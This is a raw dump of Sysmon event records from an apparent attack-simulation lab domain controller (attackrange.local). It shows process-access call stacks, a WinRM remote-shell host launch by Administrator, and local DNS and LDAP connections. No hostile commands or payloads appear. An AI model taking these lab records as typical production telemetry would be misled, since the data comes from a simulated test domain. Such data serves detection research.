12:01:27.158{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.127{266CAFBE-646C-6064-1500-00000000AE01}13161696C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.111{266CAFBE-6497-6064-8300-00000000AE01}44724460C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.070{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6497-6064-4335-070000000000}0x735430HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.018{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.018{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.018{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
354300x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.790{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53530-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.790{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53530-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.789{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63403- 354300x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.788{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53529-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.788{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53529-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.787{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59841- 354300x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.786{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55220- 354300x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.782{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54675-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.782{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54675-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.781{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62054- 354300x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.780{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local54674-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.780{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local54674-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.779{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
